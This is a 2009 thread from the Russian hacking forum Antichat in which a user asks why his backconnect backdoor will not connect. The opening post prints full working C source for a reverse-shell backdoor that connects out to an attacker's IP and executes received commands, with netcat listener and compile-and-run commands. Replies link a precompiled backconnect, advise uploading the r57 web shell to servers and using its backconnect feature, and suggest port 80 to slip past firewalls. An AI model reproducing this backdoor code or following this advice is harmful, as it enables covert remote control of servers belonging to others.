Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)
-   -   как произвести backconnect? (https://forum.antichat.xyz/showthread.php?t=116893)

krobol 20.04.2009 20:55
как произвести backconnect?
 
у меня не получается использовать backconnect backdoor:

беру сервер на котором с которым удаётся установить соединение через бэкдор - всё работает

отключаю у себя windows firewall, антивирус

запускаю: nc -l -p 13001

на сервере запускаю:
gcc bd.c -o bd
./bd my_ip 13001

свой ip узнаю на сайте cmyip.com, либо из коммандной строки: ipconfig

ниже код backconnect backdoor

Код:
/*
oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888....
.88...8888.........888....888....
o88o....88.o88oooo888....o888o...
*********************************
**** Network security team ******
********* nst.void.ru ***********
*********************************
* Title: nsT BackConnect Backdoor v1.0
* Date: 09.04.2006
* Usage:
*        client:        nc -lp 9999
*        server: ./backconnect <ip_client> 9999
*********************************
*/

#include <stdlib.h>
#include <stdio.h>
#include <error.h>
#include <string.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <resolv.h>

int main (int argc, char **argv) {
    struct sockaddr_in sock;
    int sd;
    char command[256];
   
    if (argc < 3) {
        printf("%s <host> <port>\n", argv[0]);
        return 1;
    }
   
    close(1);
   
    if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
        perror(argv[0]);
        return 1;
    }
   
    bzero(&sock, sizeof(sock));
   
    sock.sin_family = AF_INET;
    sock.sin_port = htons(atoi(argv[2]));
    inet_aton(argv[1], &sock.sin_addr);
   
    if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) {
        perror(argv[0]);
        return 1;
    }
   
    close(2);
    dup(sd);
   
    bzero(command, 256);
    while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) {
        system(command);
        bzero(command, 256);
    }
   
    close(sd);
    return 0;
}
... и соединения не происходит. В чём может быть проблема?

интернет через corbina, backconnect пробовал произвести на нескольких серверах - нигде не получилось.
Пробовал в одном окне: nc -l -p 1234, а в другом окне: nc my_ip 1234 - всё нормально работает.

SanyaX 20.04.2009 21:05
Держи другой бэкконект.
http://rapidshare.com/files/223658318/back.html
Скомпилированный.
Не когда не подводил, всегда проканывал.
use:./back your_ip
nc:nc -l -p 4000
Возможно соеденение не идёт из-за фаера на серваке.
Режет запросы.
Если что сорцы.
http://rapidshare.com/files/223659648/back.c.html

krobol 20.04.2009 22:19
не получилось. результат тот-же
Цитата:
Возможно соеденение не идёт из-за фаера на серваке.
как можно это обойти и совершить коннект?

Tigger 20.04.2009 22:29
1. Залей шелл r57. Потом открой NetCat и запусти с параметром -l -n -v -p 11457
Потом в самом низу шелла r57 есть менюшка бэкконект. В поле порт вбей 11457, а в поле IP свое IP. Нажми connect.

2. Если не получается, т.е. блочит фаер. В полне возможно, что он просто блочит порты все кроме 80. Т.е. открой у себя 80 порт и пробуй на него ;)

krobol 21.04.2009 07:53
1)
D:\nc>nc -l -n -v -p 80
listening on [any] 80 ...

2)
шелл r57 -> ::Сеть:: -> back connect:
IP: мой
порт: 80

не получилось.

пробую на этом сервере: <вырезано>

Подскажите, какие ещё варианты?

Tigger 21.04.2009 08:42
krobol, через r57 попробуй на другой порт. На тот, что я привел в примере. Попробуй сам открыть порт через этот шелл. Если получиться открыть порт, то на него делай бэкконект. А чтобы делать на 80, то надо его у себя открыть сначало ;)


ЗЫ: Зачем оставлять линк, если на шелле висит авторизация? о_0

krobol 21.04.2009 09:12
Цитата:
Сообщение от Tigger
ЗЫ: Зачем оставлять линк, если на шелле висит авторизация? о_0
авторизация: логин: 1, пароль: 1 - я указал в скобках

открывать порт через шелл и коннектится к нему у меня получается (если не здесь, то на других серверах точно получалось). А вот backconnect нигде не получается

Как открыть у себя 80 порт? Если: nc -l -n -v -p 80, то так я делал.

krobol 21.04.2009 12:50
на своём компе набрал
> ipconfig
ответ:

corbina - PPP адаптер:

DNS-суффикс этого подключения . . :
IP-адрес . . . . . . . . . . . . : 93.80.84.170
Маска подсети . . . . . . . . . . : 255.255.255.255
Основной шлюз . . . . . . . . . . : 93.80.84.170

отключил firewall, антивирус и набрал:
> nc -l -p 33333

затем, зашёл в unix-shell (/bin/bash) на сервер. Там оказался netcat, я набрал:
$ nc 93.80.84.170 33333

и ничего не проходит. Почему?

$ ping 93.80.84.170 работает

помогите, пожалуйста, разобраться

Tigger 21.04.2009 17:16
Чего-то ты тупишь =\
Я все сделал и никаких проблем нету =\
Сейчас видео сниму.


add:
Вот тут можешь скачать видео: http://webfile.ru/3431653

krobol 21.04.2009 17:20
сделал на том сервере, который я указал??


Время: 07:50
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице